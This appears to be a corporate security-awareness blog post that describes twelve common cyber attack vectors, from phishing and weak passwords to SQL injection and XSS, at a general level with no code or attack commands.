An attack vector is a path or means by which a cyber criminal can gain unauthorized access to a network or system. Understanding common attack vectors is a good place to start (especially with the average cost of a breach over $4 million) so can help you protect yourself and your organization from becoming the next victim.
In this blog post, we’ll take a look at 12 common attack vectors that threat actors use in an attempt to infiltrate their target. After all, it’s best to be prepared!
What is the difference between an attack vector and an attack surface?
An attack vector is a method used to gain privileged access to networks, systems, IoT, and other IT infrastructure. In other words, they enable hackers to exploit vulnerabilities and can lead to security incidents.
The attack surface, on the other hand, refers to the sum of all possible attack vectors.
Why do cyber criminals exploit attack vectors?
An attack vector provides an avenue for a cyber criminal to infiltrate a system, steal information, or disrupt service. The primary motivator of cyber attacks is monetary gain, but this isn’t always the case. Attack vectors are often discussed in terms of the CIA triad: confidentiality, integrity, and availability. A successful attack achieves the desired result by violating at least one of the three principles.
What are the most common attack vectors?
Social engineering
98% of the cyber attacks we see today come from instances of social engineering. This refers to the use of deception (usually exploitation of their target’s goodwill) to manipulate someone into divulging sensitive information which can then be used for fraudulent purposes. Examples of social engineering attacks include baiting, scareware, pretexting, tailgating, and phishing.
Phishing is one of the most common social engineering attack techniques that uses disguised email as a weapon. The term “phishing” is a play on the word “fishing,” because in both cases someone is trying to trick you into doing something you wouldn’t normally do.
Business email compromise (BEC) is a type of phishing attempt where the recipient is tricked into believing that the message is something they want or need – a request from their bank, for instance, or a note from someone in their company – and to click a link or download an attachment. Since social engineering scams are crafted to look legitimate, it can be easy for people to be fooled by them.
Email scams and attachments
Following on from our previous point, email attachments can be a huge danger to your business (and personal life). They are a popular way for cyber attackers to compromise systems and steal data – easy to execute and carry out at scale. With more than 281 billion emails sent every day, it’s an efficient way to reach a large number of victims quickly.
An email scam is when a cyber criminal sends an email that appears to be from a legitimate source in the hopes of stealing sensitive data or money, infecting your computer with malware, or getting you to click on an attachment that will take you to a fraudulent site.
With a wide variety of different attacks ranging from phishing to malware, these threats come in all shapes and sizes. The anatomy of malicious emails varies, but they usually:
- Are either riddled with typos and grammatical errors or near-perfect masquerades of trusted institutions (like PayPal)
- Have a sense of urgency – for example, call to actions such as “Act now!”
- Don’t include a personal greeting – most legitimate companies greet their customers by name if they send an email
- Request for bank details or other personal information
Because people can be easily coerced into clicking on attachments in social engineering attempts like these, scammers often triumph.
Compromised or weak credentials
With the wider use of multiple accounts and devices, people have become increasingly careless about protecting their credentials. A weak password is an open door to cyber criminals – attackers can gain access to your private information, steal your data, and even commit identity theft. With reused passwords, if a hacker compromises one set of credentials, they can do the same to other accounts.
Passwords managers and multi-factor authentication are critical to reducing the risk of falling victim to a security breach.
Unsecured wifi networks
Have you ever connected to an internet hotspot in a coffee shop, hotel, or maybe airport? Have you wondered whether it was safe to do so? When using unsecured public wifi networks, it’s the same thing as having a conversation in a crowded room. You have no way of knowing who else is listening in, and the same goes for your data.
The idea is that when customers have access to the internet, they’ll sit around longer spending more money. But what many businesses don’t always realize is that providing public wifi actually puts their customers at risk of being hacked.
When you connect to a public wifi network, cyber criminals can easily intercept your data and steal personal information and also infect your device with malware. Once an initial foothold is gained, they can see everything you do online. Whether you are online shopping or sending emails, the hacker could have access to your usernames and passwords or credit card numbers.
Outdated software and operating systems
You might not think about it, but the software, operating systems, and hardware you use every day are just as susceptible to security vulnerabilities. Organizations often fall victim to security incidents because they have unpatched software and/or operating systems.
The Equifax breach was the result of a known vulnerability in the organization’s web application software that was not updated. Also, the massive WannaCry ransomware attack in 2017 initially infected 200,000 computers running on unpatched Windows operating systems that were no longer supported by Microsoft.
When developing your company’s cyber security strategy, it’s important to evaluate everything from your routers to your servers and workstations. For most, this is a considerable challenge because they have many different types of hardware and software applications. The bigger the business, the harder it is to manage threats.
Ransomware
Ransomware is a form of extortion in which data is either encrypted or permanently deleted unless a ransom is paid. The number of these attacks has skyrocketed over the last few years, demonstrating one thing: there is no industry that’s immune from this crime. WannaCry’s attack was felt worldwide, targeting computers running the Windows operating system, demanding crypto payments.
The FBI recommends that you not pay up: One of the problems with letting ransoms get paid is it encourages cyber criminals to keep doing it and it may make you more likely to be targeted in the future.
Third-party breaches
Third-party vendors are businesses that provide services or materials for your company. These vendors can be internal (such as human resources or information technology) or external (such as suppliers or distributors).
The risk associated with each vendor is unique, but it’s important for your organization to understand the inherent risks associated with each vendor relationship because these relationships can significantly increase the risk of a cyber security incident.
After all, not only does the security of your data heavily depend on the security measures put in place by your vendors, but also their partners’ and suppliers’ security measures. And if one of them fails? You’re at risk and so is your business.
Configuration weaknesses
If you have a computer, there’s a good chance that you’ve fallen victim to some sort of misconfiguration-induced vulnerability. They can be the root cause of many issues. For example, configuration weaknesses that allow attackers to steal your data to simple mistakes that let them access your IT infrastructure without your knowledge.
The easiest way to avoid getting hacked is by paying attention. It might seem like common sense, but the best way to spot misconfigurations is by understanding the difference between intentional and unintentional errors. Common misconfigurations include:
- Accidental exposure of sensitive information, such as passwords and usernames.
- Unintentional disclosure of access rights, such as allowing all users to access certain resources.
- Security leaks through backdoors and other methods that allow attackers to exploit weaknesses in a system.
Zero-day vulnerabilities
A zero-day vulnerability is a flaw in a software program that is publicly disclosed by its ‘discoverer’ before the developer of the program has had time to address it. The term is derived from the notion that developers have ‘zero days’ to prepare for an attack once an exploit is released into the wild.
The primary goal of zero-day attacks is often to gain unauthorized access to a computer system or network. The term isn’t limited to vulnerabilities and exploits but also applies to software programs designed with malicious intent.
An attacker can use a zero-day exploit against unpatched systems, giving them an opportunity to steal data or install other malicious software on a victim’s computer. An attacker might also sell the exploit code to others on darknet markets, or keep it for themselves so they are the only ones who can use it for their own criminal activities.
Distributed Denial of Service (DDoS)
The DDoS cyber attack is one of the most common forms of hacking. It’s a technique that can be used to bring down data centers like websites and servers or prevent users from accessing them in the first place.
The attack works by overwhelming the target network with so much traffic that it can no longer cope and becomes unavailable to normal users. It sounds simple, but DDoS attacks are becoming increasingly sophisticated and difficult to defend against.
SQL injections
Injection attacks are common, and SQL injection is the top application layer web attack. It allows hackers to gain database information such as usernames and passwords and potentially compromise websites and web applications that rely on the database.
SQL injections are difficult to prevent because they are not always easy to detect, especially when data is retrieved from multiple databases.
Cross-Site Scripting (XSS)
XSS attacks are another type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end-user.
Flaws that allow these attacks to succeed tend to be quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Find and eliminate your attack vectors
Widespread cyber attacks that we increasingly see in the news are an unfortunate reality in the age of digitalized data. And while these breaches have had a significant impact on society, they also provide an opportunity to learn how to better protect ourselves from cyber threats.
In the never-ending quest to keep our data and systems safe, it’s vital for organizations to value good cyber hygiene and understand risk. However, this has become a serious challenge as the attack surface grows constantly. Awareness of the most common attack vectors is a good place to start – it’s time to arm yourself with the knowledge you need to protect your organization.